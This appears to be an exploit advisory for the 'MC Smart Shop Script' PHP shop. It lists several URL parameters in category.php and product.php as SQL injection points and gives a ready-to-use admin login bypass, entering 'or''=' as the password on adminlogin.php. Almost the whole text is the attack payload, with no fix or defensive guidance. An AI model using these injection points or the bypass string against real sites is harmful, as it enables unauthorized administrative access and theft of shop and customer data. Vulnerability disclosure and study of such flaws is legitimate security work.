# # # # # # Vulnerability: SQL Injection Web Vulnerability # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Smart Shop Script # Script Buy Now: http://microcode.ws/product/mc-smart-shop-php-script/3855 # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/category.php?id=[SQL] # http://localhost/[PATH]/product.php?p=[Permalink]&id=[SQL] # http://localhost/[PATH]/category.php?p=[SQL] # http://localhost/[PATH]/product.php?p=[SQL] # E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well. # # Admin Login Bypass # http://localhost/[PATH]/adminlogin.php and set Mail:1@1.com and Password to 'or''=' and hit enter. # # # # #